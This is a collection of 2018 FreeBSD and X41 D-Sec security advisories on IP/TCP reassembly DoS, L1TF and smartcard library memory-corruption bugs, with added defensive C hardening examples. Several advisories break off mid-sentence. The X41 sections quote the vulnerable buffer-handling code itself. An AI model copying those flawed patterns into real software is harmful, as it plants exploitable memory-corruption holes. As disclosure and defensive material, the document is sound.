following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of packets
which are too big to traverse all the links between two end stations. Any
router along the path between two end hosts may fragment packets which are
larger than a link's maximum transmission unit (MTU). FreeBSD's
implementation of some IPv4 protocols (such as the Transmission Control
Protocol [TCP]) performs path MTU discovery to avoid the need for
fragmentation.

IP version 6 (IPv6) retains the concept of packet fragmentation. It changed
the fragmentation operation to require that the originating end-system
perform path MTU discovery and fragment packets which are too large for any
MTU along the path between two end systems.

While all hosts attached to the Internet are required to support
fragmentation and reassembly, many hosts will encounter very few legitimate
fragmented packets due to the operation of path MTU discovery.

II.  Problem Description

A researcher has notified us of a DoS attack applicable to another operating
system. While FreeBSD may not be vulnerable to that exact attack, we have
identified several places where inadequate DoS protection could allow an
attacker to consume system resources.

It is not necessary that the attacker be able to establish two-way
communication to carry out these attacks. These attacks impact both IPv4 and
IPv6 fragment reassembly.

III. Impact

In the worst case, an attacker could send a stream of crafted fragments with
a low packet rate which would consume a substantial amount of CPU.

Other attack vectors allow an attacker to send a stream of crafted fragments
which could consume a large amount of CPU or all available mbuf clusters on
the system.

These attacks could temporarily render a system unreachable through network
interfaces or temporarily render a system unresponsive. The effects of the
attack should clear within 60 seconds after the attack stops.

IV.  Workaround

Disable fragment reassembly, using these commands:

% sysctl net.inet.ip.maxfragpackets=0
% sysctl net.inet6.ip6.maxfrags=0

On systems compiled with VIMAGE, these sysctls will need to be executed for
each VNET.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release or
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc
# gpg --verify ip.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:09.l1tf                                       Security Advisory
                                                          The FreeBSD Project

Topic:          L1 Terminal Fault (L1TF) Kernel Information Disclosure

Category:       core
Module:         Kernel
Announced:      2018-08-14
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:       CVE-2018-3620, CVE-2018-3646

Special Note:   Speculative execution vulnerability mitigation remains a work
                in progress. This advisory addresses the issue in FreeBSD
                11.1 and later. We expect to update this advisory to include
                10.4 at a later time.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

When a program accesses data in memory via a logical address, it is
translated to a physical address in RAM by the CPU. Accessing an unmapped
logical address results in what is known as a terminal fault.

II.  Problem Description

On certain Intel 64-bit x86 systems there is a period of time during terminal
fault handling where the CPU may use speculative execution to try to load
data. The CPU may speculatively access the level 1 data cache (L1D). Data
which would otherwise be protected may then be determined by using side
channel methods.

This issue affects bhyve on FreeBSD/amd64 systems.

III. Impact

An attacker executing user code, or kernel code inside of a virtual machine,
may be able to read secret data from the kernel or from another virtual
machine.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date, and
reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc
# gpg --verify l1tf-11.2.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc
# gpg --verify l1tf-11.1.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2018-3620 (L1 Terminal Fault-OS)

FreeBSD reserves the memory page at physical address 0, so it will not
contain secret data. FreeBSD zeros the paging data structures for unmapped
addresses, so that speculatively executed L1 Terminal Faults will access only
the reserved, unused page.

CVE-2018-3646 (L1 Terminal Fault-VMM)

Patched systems flush the L1 data cache prior to guest entry, so that there
is no secret data in cache for a terminal fault (from the guest) to access.

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/11/                                                        r337794
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

More information on L1 Terminal Fault is available at:

https://cve.mitre.o
FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:08.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in TCP reassembly

Category:       core
Module:         inet
Announced:      2018-08-06
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
                2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
                2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:       CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2018-08-06 Initial release.
v1.1  2018-08-14 Fixed documentation date in manual pages.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data stream
service. To transmit a stream of data, TCP breaks the data stream into
segments for transmission through the Internet, and reassembles the segments
at the receiving side to recreate the data stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on segment
processing to grow linearly with the number of segments in the reassembly
queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system can
degrade the victim system's network performance and/or consume excessive CPU
by exploiting the inefficiency of TCP reassembly handling, with relatively
small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems to
only accept TCP connections from trusted end-stations, if it is possible to
do so.

For systems which must accept TCP connections from untrusted end-stations,
the workaround is to limit the size of each reassembly queue. The capability
to do that is added by the patches noted in the "Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size of each
TCP connection's reassembly queue. The value is controlled by a sysctl
(net.inet.tcp.reass.maxqueuelen), which sets the maximum number of TCP
segments that can be outstanding on a session's reassembly queue. This value
defaults to 100.

Note that setting this value too low could impact the throughput of TCP
connections which experience significant loss or reordering. However, the
higher this number is set, the more resources can be consumed on TCP
reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

[*** v1.1 NOTE ***]
The following patchsets are provided for completeness; they have little
impact on runtime behavior.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc
# gpg --verify tcp-man-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc
# gpg --verify tcp-man-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reb
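Both FreeBSD-SA-18:10.ip and FreeBSD-SA-18:08.tcp above come down to the same defensive rule: the only queue an unauthenticated sender can grow at will is the out-of-order one, so that queue must have a hard per-connection cap. The following added example models that rule in user-space C; it is not FreeBSD kernel code. It keeps a sorted list of out-of-order segments per connection with a cap that mirrors the advisory's net.inet.tcp.reass.maxqueuelen default of 100, and treats a cap of 0 the way the IP advisory's maxfragpackets=0 workaround does (no buffering at all). Sequence numbers are plain integers here (no 32-bit wrap handling), and the function names and the constructed flood in simulate_flood() are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define REASS_MAXQUEUELEN 100   /* the advisory's default for net.inet.tcp.reass.maxqueuelen */

/* One out-of-order segment covering [seq, seq+len). Assumption for brevity:
 * sequence numbers never wrap, so plain comparisons are used. */
struct seg { uint32_t seq, len; struct seg *next; };

struct reass_queue {
    uint32_t rcv_nxt;    /* next in-order byte the receiver expects */
    struct seg *head;    /* queued segments, sorted by seq */
    unsigned qlen;       /* current queue length */
    unsigned maxqlen;    /* cap; 0 disables buffering of out-of-order data */
    unsigned dropped;    /* segments refused because the queue was full */
};

void rq_init(struct reass_queue *q, uint32_t isn, unsigned maxqlen)
{
    q->rcv_nxt = isn; q->head = NULL; q->qlen = 0; q->maxqlen = maxqlen; q->dropped = 0;
}

void rq_free(struct reass_queue *q)
{
    while (q->head) { struct seg *s = q->head; q->head = s->next; free(s); }
    q->qlen = 0;
}

/* Offers a segment to the queue. Returns 1 if it was consumed or queued,
 * 0 if it was dropped because the per-connection cap was reached. */
int rq_insert(struct reass_queue *q, uint32_t seq, uint32_t len)
{
    if (len == 0 || seq + len <= q->rcv_nxt)
        return 1;                           /* empty, or a full retransmit */
    if (seq <= q->rcv_nxt) {
        /* In-order data: advance rcv_nxt, then drain every queued segment
         * that has become contiguous. The walk is bounded by maxqlen. */
        q->rcv_nxt = seq + len;
        while (q->head && q->head->seq <= q->rcv_nxt) {
            struct seg *s = q->head;
            if (s->seq + s->len > q->rcv_nxt) q->rcv_nxt = s->seq + s->len;
            q->head = s->next; free(s); q->qlen--;
        }
        return 1;
    }
    /* Out-of-order data: this is the path a remote sender can drive at
     * will, so it is the one that must be capped. */
    if (q->qlen >= q->maxqlen) { q->dropped++; return 0; }
    struct seg *s = malloc(sizeof *s);
    if (!s) { q->dropped++; return 0; }
    struct seg **pp = &q->head;                 /* sorted insert, O(maxqlen) */
    while (*pp && (*pp)->seq < seq) pp = &(*pp)->next;
    s->seq = seq; s->len = len; s->next = *pp; *pp = s; q->qlen++;
    return 1;
}

/* Constructed flood: nsegs one-byte segments, none of them in order.
 * Returns the resulting queue length and reports how many were refused. */
unsigned simulate_flood(unsigned maxqlen, unsigned nsegs, unsigned *dropped)
{
    struct reass_queue q;
    rq_init(&q, 1, maxqlen);
    for (unsigned i = 0; i < nsegs; i++)
        rq_insert(&q, 3 + 2 * i, 1);        /* gaps guarantee nothing drains */
    unsigned qlen = q.qlen;
    *dropped = q.dropped;
    rq_free(&q);
    return qlen;
}

int main(void)
{
    unsigned dropped;
    unsigned qlen = simulate_flood(REASS_MAXQUEUELEN, 1000, &dropped);
    printf("capped queue: %u queued, %u dropped\n", qlen, dropped);
    qlen = simulate_flood(0, 1000, &dropped);
    printf("reassembly disabled: %u queued, %u dropped\n", qlen, dropped);
    return 0;
}
```

With the cap in place, memory and the per-segment walk are both bounded by maxqlen regardless of how many crafted segments arrive; the cost, as the advisory notes, is that legitimately lossy or reordered connections lose throughput when the cap is set too low.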
X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-004

Multiple Vulnerabilities in Yubico libykneomgr
==============================================

Overview
--------
Confirmed Affected Versions: 0.1.9
Confirmed Patched Versions: -
Vendor: Yubico / Deprecated
Vendor URL: https://www.yubico.com/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/

Summary and Impact
------------------
An out of bounds write and read were discovered when malicious responses
from a smartcard are received. These might lead to memory corruption. We
assume that these are not easily exploitable.

X41 did not perform a full test or audit on the software.

Please note that the library has been deprecated for more than a year and no
update will be published by the vendor.

Product Description
-------------------
This is a C library to interact with the CCID part of the YubiKey NEO. There
is a command line tool "ykneomgr" for interactive use. It supports querying
the YubiKey NEO for firmware version, operation mode (OTP/CCID) and serial
number. You may also mode switch the device and manage applets (list, delete
and install).

Out of Bounds Read/Writes
=========================
Severity Rating: Medium
Vector: APDU Response
CVE:
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
File lib/backend_pcsc.c contains the following code in function
`backend_applet_list()`:

{% highlight c %}
      {
	size_t i;
	size_t this_len = recv[length++];
	for (i = 0; i < this_len; i++)
	  {
	    if (applet_str)
	      {
		if (real_len + 2 > *len)
		  {
		    return YKNEOMGR_BACKEND_ERROR;
		  }
		sprintf (p, "%02x", recv[length]);
		p += 2;
	      }
	    real_len += 2;
	    length++;
	  }
	if (applet_str)
	  {
	    if (real_len + 1 > *len)
	      {
		return YKNEOMGR_BACKEND_ERROR;
	      }
	    *p = '\0';
	    p++;
	  }
	real_len++;
	length += 2;
      }
{% endhighlight %}

There is an off-by-one write of a '\x00' when sprintf() is called, since it
terminates the string with a trailing null byte.

Additionally, reads are performed based on this_len, which is retrieved from
the data without further safety checks.

Workarounds
-----------
It is advised to migrate to YubiKey Manager since the vendor does not support
the library anymore and will not issue a patch.

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug, but states that library is deprecated, will
           not be fixed
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Registered office: Aachen, Amtsgericht Aachen (district court): HRB19989
Managing Director: Markus Vervier
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3PMACgkQo5Klpg50
CxCvvA//RdQkadlV9yD1IFM7+lqkfMYCyeRyjEg19NWY7QL3Y6C0BeMNiMv/q74i
TUw3G30X6ehgsaef5VWzpC7IibUC2DbltIZV3tYpNHePvc4GeMAl9dytqAy4MGnM
EIxC7RrT4w85EDnaK9NvEXdo2QOlSuzt1MtePYhmoa23wZFH328w1WVhxgAYffna
Cu7LCJIgWkh1y5jqc66553g34SRH3jiuVYSwTgIzC2MhVnXrjktbIwgddJLkV5Zr
eRktqby13iWZns/oGE4GYjsmryoXaoDfGS5wuro7CNua+JqiEPwsH0bURvJDUxGi
MvEEMl5TwoCeTzDqsofLBou1RNLVyI6W19MnYhNC6RCSUuFRXFF3nHqO7vQ5Gpft
JS6URDUKWd/reh0Xwy3dlaEaXEIUPEHBcLwd0wmKqVgMTjUrOvgIAED8woS+Rzn9
qI+NbooNGt1OzlXR4RojKjRMJtWcwya8bhlNLk/ZFl/pokAEh6bZ1jcMg/U0NG9Q
R4AI2u2NX3lE39ku/dcTQQCJpTTcr0DdGUw6kux0dkJXEhEc6YixgFzrHH1CPS/y
2sYLICX3iWjAtd81CO0PL4QXte2ekh8YWaf/1qV2BusOxwlHQjODO8o3kLueU2DC
Uy4ftml35nu+qVS+vYA85N4+4/Fri6UkbjkgbI2fODgE3pImc+A=
=dyfA
-----END PGP SIGNATURE-----
X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-005

Multiple Vulnerabilities in Apple smartcardservices
===================================================

Overview
--------
Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f
Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de
Vendor: Apple
Vendor URL: https://smartcardservices.github.io/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/

Summary and Impact
------------------
Attackers with local access can exploit security issues in the smartcard
driver. These result in memory corruption, which might lead to code
execution. Since smartcards can be used for authentication, the
vulnerabilities may allow an attacker to log in to the system as any user
without valid credentials.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
The Smart Card Services project is comprised of several components which,
when combined, provide the necessary abstraction layer and integration of
smart cards into Apple's CDSA implementation.

Stack based buffer overflow
===========================
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4300
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
In file Tokend/CAC/CACRecord.cpp the function
CACCertificateRecord::getDataAttribute() might overwrite the value
certificate and possibly other stack data, if a smartcard provides malicious
data.

{% highlight c++ %}
	unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 };
	unsigned char result[MAX_BUFFER_SIZE];
	size_t resultLength = sizeof(result);
	uint8 certificate[CAC_MAXSIZE_CERT];
	uint8 uncompressed[CAC_MAXSIZE_CERT];
	size_t certificateLength = 0;
	try
	{
		PCSC::Transaction _(cacToken);
		cacToken.select(mApplication);
		uint32_t cac_return;
		do
		{
			cac_return = cacToken.exchangeAPDU(command, sizeof(command), result, resultLength);
			if ((cac_return & 0xFF00) != 0x6300)
				CACError::check(cac_return);
			size_t requested = command[4];
			if (resultLength != requested + 2)
				PCSC::Error::throwMe(SCARD_E_PROTO_MISMATCH);
			memcpy(certificate + certificateLength, result, resultLength - 2);
			certificateLength += resultLength - 2;
			// Number of bytes to fetch next time around is in the last byte
			// returned.
			command[4] = cac_return & 0xFF;
		} while ((cac_return & 0xFF00) == 0x6300);
	}
	catch (...)
	{
		return NULL;
	}
{% endhighlight %}

As long as the smartcard returns a status word of 0x63FF, more data is copied
into the certificate buffer, causing a stack based overflow. A malicious
smartcard is able to control all of the overflowed bytes.

Workarounds
-----------
None

Stack based buffer overflow with limited input
==============================================
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4301
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function
GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value strData
if the supplied dataLength is too big.

{% highlight c++ %}
void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken &, CK_ULONG mech, const AccessCredentials *cred, unsigned char *data, size_t dataLength, unsigned char *&output, size_t &outputLength)
{
	GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt \n");
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - mechanism <%lu>\n", mech);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - cred <%p>\n", cred);
	char strData[6000];
	memset(strData, '\0', sizeof(strData));
	char *str = strData;
	for (size_t i=0; i<dataLength; i++)
	{
		[...]
	}
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - dataLength <%lu> - data <%s>\n", dataLength, strData);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - output <%p>\n", output);
	GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt - outputLength <%lu>\n", outputLength);
{% endhighlight %}

The attacker might control the data which is to be decrypted, but
exploitation is limited by the sprintf() format string.

Workarounds
-----------
None

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Automated vendor reply
2018-05-23
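The libykneomgr backend_applet_list() snippet in X41-2018-004 and the Gemalto computeDecrypt() snippet directly above share one defect: card-supplied bytes are hex-encoded with sprintf("%02x") into a fixed buffer, and the bound (where there is one) forgets the NUL that sprintf appends. The added example below shows the hardened pattern for both. It is illustration code, not libykneomgr or smartcardservices source: hex_append() is the shared, NUL-aware encoder, applet_list() re-implements the libykneomgr record layout (length byte, AID bytes, two trailing bytes) with the read-side check the original lacks, and the response bytes in demo_parse() and demo_truncated() are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Appends the hex encoding of src[0..n) to dst at *pos and leaves the result
 * NUL-terminated. The bound counts the terminator, which is exactly the byte
 * the original sprintf()-based code forgot. Returns 0, or -1 if it won't fit. */
int hex_append(char *dst, size_t cap, size_t *pos, const uint8_t *src, size_t n)
{
    if (cap == 0 || *pos >= cap)
        return -1;
    if (n > (cap - 1 - *pos) / 2)          /* need 2*n bytes plus one NUL */
        return -1;
    for (size_t i = 0; i < n; i++) {
        snprintf(dst + *pos, cap - *pos, "%02x", src[i]);
        *pos += 2;
    }
    dst[*pos] = '\0';
    return 0;
}

/* Parses an applet-list response laid out as repeated records: one length
 * byte, that many AID bytes, then two trailing bytes. Each AID becomes a hex
 * string followed by a NUL, so out holds a packed list of C strings and
 * *outlen receives the bytes used. Returns the applet count, or -1 when a
 * record does not fit in the response (read side) or in out (write side). */
int applet_list(const uint8_t *recv, size_t recv_len,
                char *out, size_t outcap, size_t *outlen)
{
    size_t length = 0, pos = 0;
    int count = 0;
    while (length < recv_len) {
        size_t this_len = recv[length++];
        /* read-side check: the record and its 2 trailing bytes must exist */
        if (this_len > recv_len - length || recv_len - length - this_len < 2)
            return -1;
        if (hex_append(out, outcap, &pos, recv + length, this_len) != 0)
            return -1;
        pos++;                              /* keep the NUL as separator */
        length += this_len + 2;
        count++;
    }
    if (outlen)
        *outlen = pos;
    return count;
}

/* Constructed well-formed response: AIDs a00001 and d276. */
int demo_parse(char *out, size_t outcap, size_t *outlen)
{
    static const uint8_t resp[] = {
        0x03, 0xA0, 0x00, 0x01, 0x07, 0x00,
        0x02, 0xD2, 0x76, 0x07, 0x00
    };
    return applet_list(resp, sizeof resp, out, outcap, outlen);
}

/* Constructed malicious response: length byte claims 9 bytes, only 1 follows. */
int demo_truncated(void)
{
    static const uint8_t bad[] = { 0x09, 0x01 };
    char out[64];
    return applet_list(bad, sizeof bad, out, sizeof out, NULL);
}

int main(void)
{
    char out[12];
    size_t used = 0;
    int n = demo_parse(out, sizeof out, &used);
    printf("applets: %d, bytes used: %zu, first: %s, second: %s\n",
           n, used, out, out + 7);
    printf("truncated response rejected: %d\n", demo_truncated() == -1);
    return 0;
}
```

The 12-byte output buffer in main() is the interesting case: it is exactly large enough, and an 11-byte one fails cleanly instead of writing the terminator one byte past the end, which is the off-by-one the advisory describes.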
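For the CVE-2018-4300 loop in CACCertificateRecord::getDataAttribute() above, the missing control is a check of the accumulated length against the certificate buffer before each memcpy, plus a guard against a card that answers 0x63 with "0 more bytes" and would otherwise spin forever. The added example below is plain C written for this page, not the tokend code: card_exchange() is a constructed stand-in for exchangeAPDU() with an honest and an "endless" card, fetch_certificate() is the hardened loop, and CAC_MAXSIZE_CERT is assumed to be 4096.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CAC_MAXSIZE_CERT 4096   /* assumption: fixed-size certificate buffer */
#define MAX_CHUNK        0xFF   /* a 0x63XX status can announce at most 255 bytes */

/* Constructed stand-in for a CCID card answering "read next chunk" APDUs. */
struct fake_card {
    const uint8_t *data;
    size_t len, pos;
    int endless;   /* 1 = always answers 0x63FF with fresh bytes, never ends */
};

/* Mimics exchangeAPDU(): writes up to `requested` data bytes plus a 2-byte
 * status word into result and returns the status word. 0x63XX means "XX more
 * bytes available", 0x9000 means the certificate is complete. */
static uint16_t card_exchange(struct fake_card *c, uint8_t requested,
                              uint8_t *result, size_t *resultLength)
{
    size_t n;
    uint16_t sw;
    if (c->endless) {
        n = requested;
        memset(result, 0x41, n);            /* attacker-chosen filler */
        c->pos += n;
        sw = 0x63FF;
    } else {
        n = c->len - c->pos;
        if (n > requested) n = requested;
        memcpy(result, c->data + c->pos, n);
        c->pos += n;
        size_t remaining = c->len - c->pos;
        if (remaining == 0)
            sw = 0x9000;
        else
            sw = (uint16_t)(0x6300 | (remaining > MAX_CHUNK ? MAX_CHUNK : remaining));
    }
    result[n] = (uint8_t)(sw >> 8);
    result[n + 1] = (uint8_t)(sw & 0xFF);
    *resultLength = n + 2;
    return sw;
}

/* Hardened fetch loop. Returns 0 on success, -1 on a protocol error and -2
 * when the card tries to deliver more than cert_cap bytes in total. */
int fetch_certificate(struct fake_card *card, uint8_t *certificate,
                      size_t cert_cap, size_t *certificateLength)
{
    uint8_t command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 };
    uint8_t result[MAX_CHUNK + 2];
    size_t resultLength;
    uint16_t cac_return;

    *certificateLength = 0;
    do {
        size_t requested = command[4];
        cac_return = card_exchange(card, command[4], result, &resultLength);
        if ((cac_return & 0xFF00) != 0x6300 && cac_return != 0x9000)
            return -1;                      /* CACError::check() equivalent */
        if (resultLength != requested + 2)
            return -1;                      /* SCARD_E_PROTO_MISMATCH equivalent */
        size_t chunk = resultLength - 2;
        if (chunk > cert_cap - *certificateLength)
            return -2;                      /* the missing bound: refuse to overflow */
        memcpy(certificate + *certificateLength, result, chunk);
        *certificateLength += chunk;
        command[4] = (uint8_t)(cac_return & 0xFF);
        if ((cac_return & 0xFF00) == 0x6300 && command[4] == 0)
            return -1;                      /* "0 more bytes" would loop forever */
    } while ((cac_return & 0xFF00) == 0x6300);
    return 0;
}

/* Honest card holding a constructed 300-byte blob: expect rc 0, length 300. */
int run_honest(size_t *out_len)
{
    static uint8_t blob[300];
    for (size_t i = 0; i < sizeof blob; i++) blob[i] = (uint8_t)i;
    struct fake_card c = { blob, sizeof blob, 0, 0 };
    uint8_t cert[CAC_MAXSIZE_CERT];
    return fetch_certificate(&c, cert, sizeof cert, out_len);
}

/* Endless card: expect rc -2 with the buffer never exceeded. */
int run_malicious(size_t *out_len)
{
    struct fake_card c = { NULL, 0, 0, 1 };
    uint8_t cert[CAC_MAXSIZE_CERT];
    return fetch_certificate(&c, cert, sizeof cert, out_len);
}

int main(void)
{
    size_t n;
    printf("honest card: rc=%d, %zu bytes\n", run_honest(&n), n);
    printf("endless card: rc=%d, stopped at %zu bytes\n", run_malicious(&n), n);
    return 0;
}
```

Note that the bound is checked against what the card actually returned (resultLength - 2), not against the announced length in the status word; the two only coincide after the proto-mismatch check has passed.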
X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-003

Multiple Vulnerabilities in pam_pkcs11
======================================

Overview
--------
Confirmed Affected Versions: 0.6.9
Confirmed Patched Versions: -
Vendor: Unmaintained
Vendor URL: https://github.com/OpenSC/pam_pkcs11
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-003-pam_pkcs11/

Summary and Impact
------------------
It is possible to replay an authentication by using a specially prepared
smartcard or token in case pam-pkcs11 is compiled with NSS support.
Furthermore, two minor implementation issues have been identified.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
This Linux-PAM login module allows an X.509 certificate based user login.
The certificate and its dedicated private key are thereby accessed by means
of an appropriate PKCS #11 module. For the verification of the users'
certificates, locally stored CA certificates as well as either online or
locally accessible CRLs are used.

Authentication Replay
=====================
Severity Rating: High
Vector: Login attempt at compromised machine
CVE: -
CWE: 125
